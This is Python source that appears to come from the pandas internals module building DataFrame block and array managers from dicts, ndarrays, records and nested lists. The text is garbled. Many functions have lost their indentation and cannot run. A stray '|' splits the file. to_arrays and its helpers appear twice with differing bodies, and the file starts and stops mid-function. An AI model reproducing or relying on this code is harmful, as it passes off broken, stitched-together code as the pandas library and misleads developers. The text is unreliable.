    data, columns: Index | None, dtype: DtypeObj | None = None
) -> tuple[list[ArrayLike], Index]:
    """
    Return list of arrays, columns.

    Parameters
    ----------
    data : DataFrame, structured ndarray, or sequence of rows
    columns : Index or None
        Column labels; inferred from the data when None.
    dtype : np.dtype or ExtensionDtype, optional

    Returns
    -------
    list[ArrayLike]
        These will become columns in a DataFrame.
    Index
        This will become frame.columns.

    Notes
    -----
    Ensures that len(result_arrays) == len(result_index).
    """
    if isinstance(data, ABCDataFrame):
        # see test_from_records_with_index_data, test_from_records_bad_index_column
        if columns is not None:
            arrays = [
                data._ixs(i, axis=1).values
                for i, col in enumerate(data.columns)
                if col in columns
            ]
        else:
            columns = data.columns
            arrays = [data._ixs(i, axis=1).values for i in range(len(columns))]

        return arrays, columns

    if not len(data):
        # empty input: structured arrays still carry column names
        if isinstance(data, np.ndarray):
            if data.dtype.names is not None:
                # i.e. numpy structured array
                columns = ensure_index(data.dtype.names)
                arrays = [data[name] for name in columns]

                if len(data) == 0:
                    # GH#42456 the indexing above results in list of 2D ndarrays
                    # TODO: is that an issue with numpy?
                    for i, arr in enumerate(arrays):
                        if arr.ndim == 2:
                            arrays[i] = arr[:, 0]

                return arrays, columns
        return [], ensure_index([])

    elif isinstance(data[0], Categorical):
        # GH#38845 deprecate special case
        warnings.warn(
            "The behavior of DataFrame([categorical, ...]) is deprecated and "
            "in a future version will be changed to match the behavior of "
            "DataFrame([any_listlike, ...]). "
            "To retain the old behavior, pass as a dictionary "
            "DataFrame({col: categorical, ..})",
            FutureWarning,
            stacklevel=find_stack_level(),
        )
        if columns is None:
            columns = default_index(len(data))
        elif len(columns) > len(data):
            raise ValueError("len(columns) > len(data)")
        elif len(columns) < len(data):
            # doing this here is akin to a pre-emptive reindex
            data = data[: len(columns)]
        return data, columns

    elif isinstance(data, np.ndarray) and data.dtype.names is not None:
        # e.g. recarray
        columns = Index(list(data.dtype.names))
        arrays = [data[k] for k in columns]
        return arrays, columns

    # dispatch on the record type of the first row
    if isinstance(data[0], (list, tuple)):
        arr = _list_to_arrays(data)
    elif isinstance(data[0], abc.Mapping):
        arr, columns = _list_of_dict_to_arrays(data, columns)
    elif isinstance(data[0], ABCSeries):
        arr, columns = _list_of_series_to_arrays(data, columns)
    else:
        # last ditch effort
        data = [tuple(x) for x in data]
        arr = _list_to_arrays(data)

    content, columns = _finalize_columns_and_data(arr, columns, dtype)
    return content, columns
def _list_to_arrays(data: list[tuple | list]) -> np.ndarray:
# Returned np.ndarray has ndim = 2
# Note: we already check len(data) > 0 before getting hre
if isinstance(data[0], tuple):
content = lib.to_object_array_tuples(data)
else:
# list of lists
content = lib.to_object_array(data)
return content
def _list_of_series_to_arrays(
    data: list,
    columns: Index | None,
) -> tuple[np.ndarray, Index]:
    """
    Align a list of Series (and other list-likes) to a common column Index
    and stack their values into a 2D ndarray; returns (values, columns).
    """
    if columns is None:
        # data[0] is a Series, so this filtered list is non-empty
        pass_data = [x for x in data if isinstance(x, (ABCSeries, ABCDataFrame))]
        columns = get_objs_combined_axis(pass_data, sort=False)

    # cache indexers per index-object identity to avoid recomputation
    indexer_cache: dict[int, np.ndarray] = {}

    aligned_values = []
    for s in data:
        index = getattr(s, "index", None)
        if index is None:
            index = default_index(len(s))

        key = id(index)
        if key not in indexer_cache:
            indexer_cache[key] = index.get_indexer(columns)
        indexer = indexer_cache[key]

        values = extract_array(s, extract_numpy=True)
        aligned_values.append(algorithms.take_nd(values, indexer))

    # error: Argument 1 to "vstack" has incompatible type "List[ExtensionArray]"
    content = np.vstack(aligned_values)  # type: ignore[arg-type]
    return content, columns
def _list_of_dict_to_arrays(
data: list[dict],
columns: Index | None,
) -> tuple[np.ndarray, Index]:
"""
Convert list of dicts to numpy arrays
if `columns` is not passed, column names are inferred from the records
- for OrderedDict and dicts, the column names match
the key insertion-order from the first record to the last.
- For other kinds of dict-likes, the keys are lexically sorted.
Parameters
----------
data : iterable
collection of records (OrderedDict, dict)
columns: iterables or None
Returns
-------
content : np.ndarray[object, ndim=2]
columns : Index
"""
if columns is None:
gen = (list(x.keys()) for x in data)
sort = not any(isinstance(d, dict) for d in data)
pre_cols = lib.fast_unique_multiple_list_gen(gen, sort=sort)
columns = ensure_index(pre_cols)
# assure that they are of the base dict class and not of derived
# classes
data = [d if type(d) is dict else dict(d) for d in data]
content = lib.dicts_to_array(data, list(columns))
return content, columns
def _finalize_columns_and_data(
    content: np.ndarray,  # ndim == 2
    columns: Index | None,
    dtype: DtypeObj | None,
) -> tuple[list[ArrayLike], Index]:
    """
    Split a 2D ndarray into per-column arrays, validate/derive the column
    labels, and soft-cast object-dtype columns.
    """
    contents = list(content.T)

    try:
        columns = _validate_or_indexify_columns(contents, columns)
    except AssertionError as err:
        # GH#26429 do not raise user-facing AssertionError
        raise ValueError(err) from err

    if contents and contents[0].dtype == np.object_:
        contents = _convert_object_array(contents, dtype=dtype)

    return contents, columns
def _validate_or_indexify_columns(
content: list[np.ndarray], columns: Index | None
) -> Index:
"""
If columns is None, make numbers as column names; Otherwise, validate that
columns have valid length.
Parameters
----------
content : list of np.ndarrays
columns : Index or None
Returns
-------
Index
If columns is None, assign positional column index value as columns.
Raises
------
1. AssertionError when content is not composed of list of lists, and if
length of columns is not equal to length of content.
2. ValueError when content is list of lists, but length of each sub-list
is not equal
3. ValueError when content is list of lists, but length of sub-list is
not equal to length of content
"""
if columns is None:
columns = default_index(len(content))
else:
# Add mask for data which is composed of list of lists
is_mi_list = isinstance(columns, list) and all(
isinstance(col, list) for col in columns
)
if not is_mi_list and len(columns) != len(content): # pragma: no cover
# caller's responsibility to check for this...
raise AssertionError(
f"{len(columns)} columns passed, passed data had "
f"{len(content)} columns"
)
elif is_mi_list:
# check if nested list column, length of each sub-list should be equal
if len({len(col) for col in columns}) > 1:
raise ValueError(
"Length of columns passed for MultiIndex columns is different"
)
# if columns is not empty and length of sublist is not equal to content
elif columns and len(columns[0]) != len(content):
raise ValueError(
f"{len(columns[0])} columns passed, passed data had "
f"{len(content)} columns"
)
return columns
def _convert_object_array(
content: list[np.ndarray], dtype: DtypeObj | None
) -> list[ArrayLike]:
"""
Internal function to convert object array.
Parameters
----------
content: List[np.ndarray]
dtype: np.dtype or ExtensionDtype
Returns
-------
List[ArrayLike]
"""
# provide soft conversion of object dtypes
def convert(arr):
if dtype != np.dtype("O"):
arr = lib.maybe_convert_objects(arr)
arr = maybe_cast_to_datetime(arr, dtype)
return arr
arrays = [convert(arr) for arr in content]
return arrays
| """
Functions for preparing various inputs passed to the DataFrame or Series
constructors before passing them to a BlockManager.
"""
from __future__ import annotations
from collections import abc
from typing import (
TYPE_CHECKING,
Any,
Hashable,
Sequence,
cast,
)
import warnings
import numpy as np
import numpy.ma as ma
from pandas._libs import lib
from pandas._typing import (
ArrayLike,
DtypeObj,
Manager,
)
from pandas.util._exceptions import find_stack_level
from pandas.core.dtypes.cast import (
construct_1d_arraylike_from_scalar,
dict_compat,
maybe_cast_to_datetime,
maybe_convert_platform,
maybe_infer_to_datetimelike,
maybe_upcast,
)
from pandas.core.dtypes.common import (
is_1d_only_ea_dtype,
is_datetime_or_timedelta_dtype,
is_dtype_equal,
is_extension_array_dtype,
is_integer_dtype,
is_list_like,
is_named_tuple,
is_object_dtype,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCSeries,
)
from pandas.core import (
algorithms,
common as com,
)
from pandas.core.arrays import (
Categorical,
DatetimeArray,
ExtensionArray,
TimedeltaArray,
)
from pandas.core.construction import (
ensure_wrapped_if_datetimelike,
extract_array,
range_to_ndarray,
sanitize_array,
)
from pandas.core.indexes.api import (
DatetimeIndex,
Index,
TimedeltaIndex,
default_index,
ensure_index,
get_objs_combined_axis,
union_indexes,
)
from pandas.core.internals.array_manager import (
ArrayManager,
SingleArrayManager,
)
from pandas.core.internals.blocks import (
BlockPlacement,
ensure_block_shape,
new_block_2d,
)
from pandas.core.internals.managers import (
BlockManager,
SingleBlockManager,
create_block_manager_from_blocks,
create_block_manager_from_column_arrays,
)
if TYPE_CHECKING:
from numpy.ma.mrecords import MaskedRecords
# ---------------------------------------------------------------------
# BlockManager Interface
def arrays_to_mgr(
    arrays,
    columns: Index,
    index,
    *,
    dtype: DtypeObj | None = None,
    verify_integrity: bool = True,
    typ: str | None = None,
    consolidate: bool = True,
) -> Manager:
    """
    Segregate Series based on type and coerce into matrices.
    Needs to handle a lot of exceptional cases.

    Parameters
    ----------
    arrays : sequence of column data (arrays, Series, dicts, ...)
    columns : Index
    index : Index or None
        Derived from the arrays when None (requires verify_integrity=True).
    dtype : np.dtype or ExtensionDtype, optional
    verify_integrity : bool, default True
        When False (DataFrame._from_arrays fast path) the arrays are assumed
        pre-homogenized and only cheaply validated.
    typ : {"block", "array"}
        Which manager implementation to construct.
    consolidate : bool, default True
        Passed through to the BlockManager constructor.

    Returns
    -------
    Manager
    """
    if verify_integrity:
        # figure out the index, if necessary
        if index is None:
            index = _extract_index(arrays)
        else:
            index = ensure_index(index)

        # don't force copy because getting jammed in an ndarray anyway
        arrays = _homogenize(arrays, index, dtype)
        # _homogenize ensures
        # - all(len(x) == len(index) for x in arrays)
        # - all(x.ndim == 1 for x in arrays)
        # - all(isinstance(x, (np.ndarray, ExtensionArray)) for x in arrays)
        # - all(type(x) is not PandasArray for x in arrays)

    else:
        index = ensure_index(index)
        arrays = [extract_array(x, extract_numpy=True) for x in arrays]

        # Reached via DataFrame._from_arrays; we do validation here
        for arr in arrays:
            if (
                not isinstance(arr, (np.ndarray, ExtensionArray))
                or arr.ndim != 1
                or len(arr) != len(index)
            ):
                raise ValueError(
                    "Arrays must be 1-dimensional np.ndarray or ExtensionArray "
                    "with length matching len(index)"
                )

    columns = ensure_index(columns)
    if len(columns) != len(arrays):
        raise ValueError("len(arrays) must match len(columns)")

    # from BlockManager perspective
    axes = [columns, index]

    if typ == "block":
        return create_block_manager_from_column_arrays(
            arrays, axes, consolidate=consolidate
        )
    elif typ == "array":
        return ArrayManager(arrays, [index, columns])
    else:
        raise ValueError(f"'typ' needs to be one of {{'block', 'array'}}, got '{typ}'")
def rec_array_to_mgr(
    data: MaskedRecords | np.recarray | np.ndarray,
    index,
    columns,
    dtype: DtypeObj | None,
    copy: bool,
    typ: str,
):
    """
    Extract from a masked rec array and create the manager.

    Masked entries are filled with each column's fill value before the
    arrays are reordered to ``columns`` and packed into a Manager.
    """
    # essentially process a record array then fill it
    fdata = ma.getdata(data)
    if index is None:
        index = default_index(len(fdata))
    else:
        index = ensure_index(index)

    if columns is not None:
        columns = ensure_index(columns)
    arrays, arr_columns = to_arrays(fdata, columns)

    # fill if needed
    if isinstance(data, np.ma.MaskedArray):
        # GH#42200 we only get here with MaskedRecords, but check for the
        # parent class MaskedArray to avoid the need to import MaskedRecords
        data = cast("MaskedRecords", data)
        new_arrays = fill_masked_arrays(data, arr_columns)
    else:
        # error: Incompatible types in assignment (expression has type
        # "List[ExtensionArray]", variable has type "List[ndarray]")
        new_arrays = arrays  # type: ignore[assignment]

    # create the manager

    # error: Argument 1 to "reorder_arrays" has incompatible type "List[ndarray]";
    # expected "List[Union[ExtensionArray, ndarray]]"
    arrays, arr_columns = reorder_arrays(
        new_arrays, arr_columns, columns, len(index)  # type: ignore[arg-type]
    )
    if columns is None:
        columns = arr_columns

    mgr = arrays_to_mgr(arrays, columns, index, dtype=dtype, typ=typ)

    if copy:
        mgr = mgr.copy()
    return mgr
def fill_masked_arrays(data: MaskedRecords, arr_columns: Index) -> list[np.ndarray]:
    """
    Extract each column of a MaskedRecords, replacing masked entries with
    the (possibly upcast) fill value so the mask is softened.
    """
    filled: list[np.ndarray] = []
    for name in arr_columns:
        column = data[name]
        fill_value = column.fill_value
        column_mask = ma.getmaskarray(column)
        if column_mask.any():
            # upcast (with a copy) so the fill value fits, then fill in place
            column, fill_value = maybe_upcast(column, fill_value=fill_value, copy=True)
            column[column_mask] = fill_value
        filled.append(column)
    return filled
def mgr_to_mgr(mgr, typ: str, copy: bool = True):
    """
    Convert a Manager to the requested concrete type ("block" or "array").

    Returns the input unchanged when it already has the right type; no copy
    is guaranteed otherwise. The ``copy`` flag only controls whether the 1D
    arrays are copied during a 2D Block->ArrayManager conversion.
    """
    if typ == "block":
        if isinstance(mgr, BlockManager):
            return mgr
        if mgr.ndim == 2:
            return arrays_to_mgr(mgr.arrays, mgr.axes[0], mgr.axes[1], typ="block")
        return SingleBlockManager.from_array(mgr.arrays[0], mgr.index)

    if typ == "array":
        if isinstance(mgr, ArrayManager):
            return mgr
        if mgr.ndim == 2:
            col_arrays = [mgr.iget_values(i) for i in range(len(mgr.axes[0]))]
            if copy:
                col_arrays = [arr.copy() for arr in col_arrays]
            return ArrayManager(col_arrays, [mgr.axes[1], mgr.axes[0]])
        values = mgr.internal_values()
        if copy:
            values = values.copy()
        return SingleArrayManager([values], [mgr.index])

    raise ValueError(f"'typ' needs to be one of {{'block', 'array'}}, got '{typ}'")
# ---------------------------------------------------------------------
# DataFrame Constructor Interface
def ndarray_to_mgr(
    values, index, columns, dtype: DtypeObj | None, copy: bool, typ: str
) -> Manager:
    """
    Build a Manager (Block- or Array-based, per ``typ``) from 2D-coercible input.

    Parameters
    ----------
    values : ndarray, list, Series, Index or ExtensionArray
    index, columns : Index or None
        Axes; derived from the data when not provided.
    dtype : np.dtype or ExtensionDtype, optional
        Target dtype to coerce to.
    copy : bool
        Whether to copy the input data.
    typ : {"block", "array"}
        Which manager implementation to construct.

    Returns
    -------
    Manager
    """
    # used in DataFrame.__init__
    # input must be a ndarray, list, Series, Index, ExtensionArray
    if isinstance(values, ABCSeries):
        if columns is None:
            if values.name is not None:
                columns = Index([values.name])
        if index is None:
            index = values.index
        else:
            values = values.reindex(index)

        # zero len case (GH #2234)
        if not len(values) and columns is not None and len(columns):
            values = np.empty((0, 1), dtype=object)

    # if the array preparation does a copy -> avoid this for ArrayManager,
    # since the copy is done on conversion to 1D arrays
    copy_on_sanitize = False if typ == "array" else copy

    vdtype = getattr(values, "dtype", None)
    if is_1d_only_ea_dtype(vdtype) or is_1d_only_ea_dtype(dtype):
        # GH#19157
        if isinstance(values, (np.ndarray, ExtensionArray)) and values.ndim > 1:
            # GH#12513 a EA dtype passed with a 2D array, split into
            # multiple EAs that view the values
            # error: No overload variant of "__getitem__" of "ExtensionArray"
            # matches argument type "Tuple[slice, int]"
            values = [
                values[:, n]  # type: ignore[call-overload]
                for n in range(values.shape[1])
            ]
        else:
            values = [values]

        if columns is None:
            columns = Index(range(len(values)))
        else:
            columns = ensure_index(columns)

        return arrays_to_mgr(values, columns, index, dtype=dtype, typ=typ)

    elif is_extension_array_dtype(vdtype) and not is_1d_only_ea_dtype(vdtype):
        # i.e. Datetime64TZ, PeriodDtype; these EAs can be stored 2D directly
        values = extract_array(values, extract_numpy=True)
        if copy:
            values = values.copy()
        if values.ndim == 1:
            values = values.reshape(-1, 1)

    else:
        # by definition an array here
        # the dtypes will be coerced to a single dtype
        values = _prep_ndarray(values, copy=copy_on_sanitize)

        if dtype is not None and not is_dtype_equal(values.dtype, dtype):
            # cast the flattened data, then restore the 2D shape
            shape = values.shape
            flat = values.ravel()

            # GH#40110 see similar check inside sanitize_array
            rcf = not (is_integer_dtype(dtype) and values.dtype.kind == "f")

            values = sanitize_array(
                flat, None, dtype=dtype, copy=copy_on_sanitize, raise_cast_failure=rcf
            )

            values = values.reshape(shape)

    # _prep_ndarray ensures that values.ndim == 2 at this point
    index, columns = _get_axes(
        values.shape[0], values.shape[1], index=index, columns=columns
    )

    _check_values_indices_shape_match(values, index, columns)

    if typ == "array":

        if issubclass(values.dtype.type, str):
            # fixed-width string dtypes are stored as object columns
            values = np.array(values, dtype=object)

        if dtype is None and is_object_dtype(values.dtype):
            arrays = [
                ensure_wrapped_if_datetimelike(
                    maybe_infer_to_datetimelike(values[:, i])
                )
                for i in range(values.shape[1])
            ]
        else:
            if is_datetime_or_timedelta_dtype(values.dtype):
                values = ensure_wrapped_if_datetimelike(values)
            arrays = [values[:, i] for i in range(values.shape[1])]

        if copy:
            arrays = [arr.copy() for arr in arrays]

        return ArrayManager(arrays, [index, columns], verify_integrity=False)

    # BlockManager stores data transposed (columns-as-rows)
    values = values.T

    # if we don't have a dtype specified, then try to convert objects
    # on the entire block; this is to convert if we have datetimelike's
    # embedded in an object type
    if dtype is None and is_object_dtype(values.dtype):

        obj_columns = list(values)
        maybe_datetime = [maybe_infer_to_datetimelike(x) for x in obj_columns]
        # don't convert (and copy) the objects if no type inference occurs
        if any(x is not y for x, y in zip(obj_columns, maybe_datetime)):
            dvals_list = [ensure_block_shape(dval, 2) for dval in maybe_datetime]
            block_values = [
                new_block_2d(dvals_list[n], placement=BlockPlacement(n))
                for n in range(len(dvals_list))
            ]
        else:
            bp = BlockPlacement(slice(len(columns)))
            nb = new_block_2d(values, placement=bp)
            block_values = [nb]
    else:
        bp = BlockPlacement(slice(len(columns)))
        nb = new_block_2d(values, placement=bp)
        block_values = [nb]

    if len(columns) == 0:
        block_values = []

    return create_block_manager_from_blocks(
        block_values, [columns, index], verify_integrity=False
    )
def _check_values_indices_shape_match(
values: np.ndarray, index: Index, columns: Index
) -> None:
"""
Check that the shape implied by our axes matches the actual shape of the
data.
"""
if values.shape[1] != len(columns) or values.shape[0] != len(index):
# Could let this raise in Block constructor, but we get a more
# helpful exception message this way.
if values.shape[0] == 0:
raise ValueError("Empty data passed with indices specified.")
passed = values.shape
implied = (len(index), len(columns))
raise ValueError(f"Shape of passed values is {passed}, indices imply {implied}")
def dict_to_mgr(
    data: dict,
    index,
    columns,
    *,
    dtype: DtypeObj | None = None,
    typ: str = "block",
    copy: bool = True,
) -> Manager:
    """
    Segregate Series based on type and coerce into matrices.
    Needs to handle a lot of exceptional cases.
    Used in DataFrame.__init__

    Parameters
    ----------
    data : dict
        Mapping of column label -> column values (scalars, arrays or Series).
    index, columns : Index or None
        Requested axes; derived from the data when not provided.
    dtype : np.dtype or ExtensionDtype, optional
    typ : {"block", "array"}, default "block"
    copy : bool, default True
        Whether to copy the input arrays.

    Returns
    -------
    Manager
    """
    arrays: Sequence[Any] | Series

    if columns is not None:
        from pandas.core.series import Series

        # Reindexing the dict against ``columns`` marks requested columns
        # that are missing from ``data`` as NaN placeholders.
        arrays = Series(data, index=columns, dtype=object)
        missing = arrays.isna()
        if index is None:
            # GH10856
            # raise ValueError if only scalars in dict
            index = _extract_index(arrays[~missing])
        else:
            index = ensure_index(index)

        # no obvious "empty" int column
        if missing.any() and not is_integer_dtype(dtype):
            nan_dtype: DtypeObj

            if dtype is not None:
                # calling sanitize_array ensures we don't mix-and-match
                # NA dtypes
                midxs = missing.values.nonzero()[0]
                for i in midxs:
                    arr = sanitize_array(arrays.iat[i], index, dtype=dtype)
                    arrays.iat[i] = arr
            else:
                # GH#1783
                nan_dtype = np.dtype("object")
                val = construct_1d_arraylike_from_scalar(np.nan, len(index), nan_dtype)
                nmissing = missing.sum()
                if copy:
                    rhs = [val] * nmissing
                else:
                    # GH#45369: when not copying, each missing column must be
                    # a distinct array so later mutation doesn't alias
                    rhs = [val.copy() for _ in range(nmissing)]
                arrays.loc[missing] = rhs

        arrays = list(arrays)
        columns = ensure_index(columns)

    else:
        keys = list(data.keys())
        columns = Index(keys)
        arrays = [com.maybe_iterable_to_list(data[k]) for k in keys]
        # drop the Index wrapper, keeping the underlying array
        arrays = [arr if not isinstance(arr, Index) else arr._data for arr in arrays]

    if copy:
        if typ == "block":
            # We only need to copy arrays that will not get consolidated, i.e.
            # only EA arrays
            arrays = [x.copy() if isinstance(x, ExtensionArray) else x for x in arrays]
        else:
            # dtype check to exclude e.g. range objects, scalars
            arrays = [x.copy() if hasattr(x, "dtype") else x for x in arrays]

    return arrays_to_mgr(arrays, columns, index, dtype=dtype, typ=typ, consolidate=copy)
def nested_data_to_arrays(
    data: Sequence,
    columns: Index | None,
    index: Index | None,
    dtype: DtypeObj | None,
) -> tuple[list[ArrayLike], Index, Index]:
    """
    Convert a single nested sequence into per-column arrays plus its axes.
    """
    # By the time we get here the caller has already checked treat_as_nested(data).
    first = data[0]
    if columns is None and is_named_tuple(first):
        # Named-tuple fields double as column labels.
        columns = ensure_index(first._fields)
    arrays, columns = to_arrays(data, columns, dtype=dtype)
    columns = ensure_index(columns)
    if index is None:
        if isinstance(first, ABCSeries):
            index = _get_names_from_index(data)
        elif isinstance(first, Categorical):
            # GH#38845 hit in test_constructor_categorical
            index = default_index(len(first))
        else:
            index = default_index(len(data))
    return arrays, columns, index
def treat_as_nested(data) -> bool:
    """
    Return True when ``data`` is a sequence of 1-dim list-likes and should be
    routed through nested_data_to_arrays.
    """
    if not len(data):
        return False
    first = data[0]
    if not is_list_like(first) or getattr(first, "ndim", 1) != 1:
        return False
    # A 2D ExtensionArray is columnar data in its own right, not nesting.
    return not (isinstance(data, ExtensionArray) and data.ndim == 2)
# ---------------------------------------------------------------------
def _prep_ndarray(values, copy: bool = True) -> np.ndarray:
    """
    Coerce ``values`` to a 2D np.ndarray, converting 1D input to a single
    column and raising for ndim > 2.
    """
    if isinstance(values, TimedeltaArray) or (
        isinstance(values, DatetimeArray) and values.tz is None
    ):
        # On older numpy, np.asarray below apparently does not call __array__,
        # so nanoseconds get dropped.
        values = values._ndarray
    if not isinstance(values, (np.ndarray, ABCSeries, Index)):
        if len(values) == 0:
            return np.empty((0, 0), dtype=object)
        elif isinstance(values, range):
            arr = range_to_ndarray(values)
            # Add a trailing axis so the 1D range becomes a single column.
            return arr[..., np.newaxis]
        def convert(v):
            # Leave scalars and DataFrames untouched; everything else gets
            # platform-dtype conversion.
            if not is_list_like(v) or isinstance(v, ABCDataFrame):
                return v
            v = extract_array(v, extract_numpy=True)
            res = maybe_convert_platform(v)
            return res
        # we could have a 1-dim or 2-dim list here
        # this is equiv of np.asarray, but does object conversion
        # and platform dtype preservation
        if is_list_like(values[0]):
            values = np.array([convert(v) for v in values])
        elif isinstance(values[0], np.ndarray) and values[0].ndim == 0:
            # GH#21861 see test_constructor_list_of_lists
            values = np.array([convert(v) for v in values])
        else:
            values = convert(values)
    else:
        # drop subclass info
        values = np.array(values, copy=copy)
    if values.ndim == 1:
        values = values.reshape((values.shape[0], 1))
    elif values.ndim != 2:
        raise ValueError(f"Must pass 2-d input. shape={values.shape}")
    return values
def _homogenize(data, index: Index, dtype: DtypeObj | None) -> list[ArrayLike]:
    """
    Align each element of ``data`` (Series, dicts, or array-likes) to ``index``
    and coerce to ``dtype``, returning one array per column.
    """
    # Lazily-built object-dtype view of ``index`` used for dict lookups.
    oindex = None
    homogenized = []
    for val in data:
        if isinstance(val, ABCSeries):
            if dtype is not None:
                val = val.astype(dtype, copy=False)
            if val.index is not index:
                # Forces alignment. No need to copy data since we
                # are putting it into an ndarray later
                val = val.reindex(index, copy=False)
            val = val._values
        else:
            if isinstance(val, dict):
                # GH#41785 this _should_ be equivalent to (but faster than)
                # val = create_series_with_explicit_dtype(val, index=index)._values
                if oindex is None:
                    oindex = index.astype("O")
                if isinstance(index, (DatetimeIndex, TimedeltaIndex)):
                    # see test_constructor_dict_datetime64_index
                    val = dict_compat(val)
                else:
                    # see test_constructor_subclass_dict
                    val = dict(val)
                # Gather values for each index label, NaN where missing.
                val = lib.fast_multiget(val, oindex._values, default=np.nan)
            val = sanitize_array(
                val, index, dtype=dtype, copy=False, raise_cast_failure=False
            )
            com.require_length_match(val, index)
        homogenized.append(val)
    return homogenized
def _extract_index(data) -> Index:
    """
    Try to infer an Index from the passed data, raise ValueError on failure.

    Series indexes are unioned; dict keys are unioned without sorting; raw
    array-likes only contribute a length, which must be consistent.
    """
    index = None
    if len(data) == 0:
        index = Index([])
    else:
        raw_lengths = []
        indexes: list[list[Hashable] | Index] = []
        have_raw_arrays = False
        have_series = False
        have_dicts = False
        for val in data:
            if isinstance(val, ABCSeries):
                have_series = True
                indexes.append(val.index)
            elif isinstance(val, dict):
                have_dicts = True
                indexes.append(list(val.keys()))
            elif is_list_like(val) and getattr(val, "ndim", 1) == 1:
                have_raw_arrays = True
                raw_lengths.append(len(val))
            elif isinstance(val, np.ndarray) and val.ndim > 1:
                raise ValueError("Per-column arrays must each be 1-dimensional")
        if not indexes and not raw_lengths:
            raise ValueError("If using all scalar values, you must pass an index")
        elif have_series:
            index = union_indexes(indexes)
        elif have_dicts:
            # Dict keys keep insertion order, so don't sort the union.
            index = union_indexes(indexes, sort=False)
        if have_raw_arrays:
            lengths = list(set(raw_lengths))
            if len(lengths) > 1:
                raise ValueError("All arrays must be of the same length")
            if have_dicts:
                raise ValueError(
                    "Mixing dicts with non-Series may lead to ambiguous ordering."
                )
            if have_series:
                assert index is not None  # for mypy
                # Raw array lengths must agree with the index inferred from Series.
                if lengths[0] != len(index):
                    msg = (
                        f"array length {lengths[0]} does not match index "
                        f"length {len(index)}"
                    )
                    raise ValueError(msg)
            else:
                index = default_index(lengths[0])
    # error: Argument 1 to "ensure_index" has incompatible type "Optional[Index]";
    # expected "Union[Union[Union[ExtensionArray, ndarray], Index, Series],
    # Sequence[Any]]"
    return ensure_index(index)  # type: ignore[arg-type]
def reorder_arrays(
    arrays: list[ArrayLike], arr_columns: Index, columns: Index | None, length: int
) -> tuple[list[ArrayLike], Index]:
    """
    Pre-emptively (cheaply) reindex ``arrays`` to the requested ``columns``
    order; requested columns not present become all-NaN object arrays.
    """
    if columns is None or columns.equals(arr_columns):
        # Nothing to reorder.
        return arrays, arr_columns
    indexer = arr_columns.get_indexer(columns)
    reordered: list[ArrayLike] = []
    for loc in indexer:
        if loc == -1:
            # by convention default is all-NaN object dtype
            filler = np.empty(length, dtype=object)
            filler.fill(np.nan)
            reordered.append(filler)
        else:
            reordered.append(arrays[loc])
    return reordered, columns
def _get_names_from_index(data) -> Index:
has_some_name = any(getattr(s, "name", None) is not None for s in data)
if not has_some_name:
return default_index(len(data))
index: list[Hashable] = list(range(len(data)))
count = 0
for i, s in enumerate(data):
n = getattr(s, "name", None)
if n is not None:
index[i] = n
else:
index[i] = f"Unnamed {count}"
count += 1
return Index(index)
def _get_axes(
N: int, K: int, index: Index | None, columns: Index | None
) -> tuple[Index, Index]:
# helper to create the axes as indexes
# return axes or defaults
if index is None:
index = default_index(N)
else:
index = ensure_index(index)
if columns is None:
columns = default_index(K)
else:
columns = ensure_index(columns)
return index, columns
def dataclasses_to_dicts(data):
    """
    Converts a list of dataclass instances to a list of dictionaries.
    Parameters
    ----------
    data : List[Type[dataclass]]
    Returns
    --------
    list_dict : List[dict]
    Examples
    --------
    >>> from dataclasses import dataclass
    >>> @dataclass
    ... class Point:
    ...     x: int
    ...     y: int
    >>> dataclasses_to_dicts([Point(1, 2), Point(2, 3)])
    [{'x': 1, 'y': 2}, {'x': 2, 'y': 3}]
    """
    from dataclasses import asdict
    return [asdict(instance) for instance in data]
# ---------------------------------------------------------------------
# Conversion of Inputs to Arrays
def to_arrays(
    data, columns: Index | None, dtype: DtypeObj | None = None
) -> tuple[list[ArrayLike], Index]:
    """
    Return list of arrays, columns.
    Returns
    -------
    list[ArrayLike]
        These will become columns in a DataFrame.
    Index
        This will become frame.columns.
    Notes
    -----
    Ensures that len(result_arrays) == len(result_index).
    """
    if isinstance(data, ABCDataFrame):
        # see test_from_records_with_index_data, test_from_records_bad_index_column
        if columns is not None:
            # Keep only the requested columns, in the frame's own order.
            arrays = [
                data._ixs(i, axis=1).values
                for i, col in enumerate(data.columns)
                if col in columns
            ]
        else:
            columns = data.columns
            arrays = [data._ixs(i, axis=1).values for i in range(len(columns))]
        return arrays, columns
    if not len(data):
        if isinstance(data, np.ndarray):
            if data.dtype.names is not None:
                # i.e. numpy structured array
                columns = ensure_index(data.dtype.names)
                arrays = [data[name] for name in columns]
                if len(data) == 0:
                    # GH#42456 the indexing above results in list of 2D ndarrays
                    # TODO: is that an issue with numpy?
                    for i, arr in enumerate(arrays):
                        if arr.ndim == 2:
                            arrays[i] = arr[:, 0]
                return arrays, columns
        return [], ensure_index([])
    elif isinstance(data[0], Categorical):
        # GH#38845 deprecate special case
        warnings.warn(
            "The behavior of DataFrame([categorical, ...]) is deprecated and "
            "in a future version will be changed to match the behavior of "
            "DataFrame([any_listlike, ...]). "
            "To retain the old behavior, pass as a dictionary "
            "DataFrame({col: categorical, ..})",
            FutureWarning,
            stacklevel=find_stack_level(),
        )
        if columns is None:
            columns = default_index(len(data))
        elif len(columns) > len(data):
            raise ValueError("len(columns) > len(data)")
        elif len(columns) < len(data):
            # doing this here is akin to a pre-emptive reindex
            data = data[: len(columns)]
        return data, columns
    elif isinstance(data, np.ndarray) and data.dtype.names is not None:
        # e.g. recarray
        columns = Index(list(data.dtype.names))
        arrays = [data[k] for k in columns]
        return arrays, columns
    # Dispatch on the type of the first record to pick a conversion routine.
    if isinstance(data[0], (list, tuple)):
        arr = _list_to_arrays(data)
    elif isinstance(data[0], abc.Mapping):
        arr, columns = _list_of_dict_to_arrays(data, columns)
    elif isinstance(data[0], ABCSeries):
        arr, columns = _list_of_series_to_arrays(data, columns)
    else:
        # last ditch effort
        data = [tuple(x) for x in data]
        arr = _list_to_arrays(data)
    content, columns = _finalize_columns_and_data(arr, columns, dtype)
    return content, columns
def _list_to_arrays(data: list[tuple | list]) -> np.ndarray:
# Returned np.ndarray has ndim = 2
# Note: we already check len(data) > 0 before getting hre
if isinstance(data[0], tuple):
content = lib.to_object_array_tuples(data)
else:
# list of lists
content = lib.to_object_array(data)
return content
def _list_of_series_to_arrays(
    data: list,
    columns: Index | None,
) -> tuple[np.ndarray, Index]:
    """
    Stack a list of Series (aligned to ``columns``) into a 2D ndarray.
    """
    # returned np.ndarray has ndim == 2
    if columns is None:
        # We know pass_data is non-empty because data[0] is a Series
